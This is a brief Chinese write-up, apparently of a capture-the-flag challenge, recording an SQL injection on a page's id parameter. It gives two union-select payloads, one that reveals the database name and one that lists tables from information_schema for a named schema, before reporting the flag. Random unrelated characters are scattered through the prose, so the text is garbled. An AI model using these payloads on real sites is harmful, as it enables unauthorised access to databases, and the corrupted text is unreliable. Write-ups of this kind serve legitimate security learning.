打開頁面尋找注入點(diǎn),發(fā)現(xiàn)有一個(gè)頁面下id=25诫硕,yes,可以進(jìn)行注入了刊侯,比較簡(jiǎn)單章办,主要是記錄下過程。
id=2 and 1=2 union select 1,database(),3,4,5
可以得到數(shù)據(jù)庫的名稱滔吠,之后利用數(shù)據(jù)庫名稱進(jìn)行注入獲取表纲菌,啊我比較蠢,老是忘記數(shù)據(jù)表要加雙引號(hào)疮绷,一定要記住惹翰舌。然后就是不用group_concat,這個(gè)好像一行放不下所有的,最后一個(gè)表就看不見名稱冬骚,直接所有的都打印出來椅贱。
id=2%20and%201=2%20union%20select%201,table_name,3,4,5%20from%20information_schema.tables%20where%20table_schema=%27u9897uwx_kabel%27%23
之后頁面會(huì)出現(xiàn)所有表的名稱,得到flag只冻。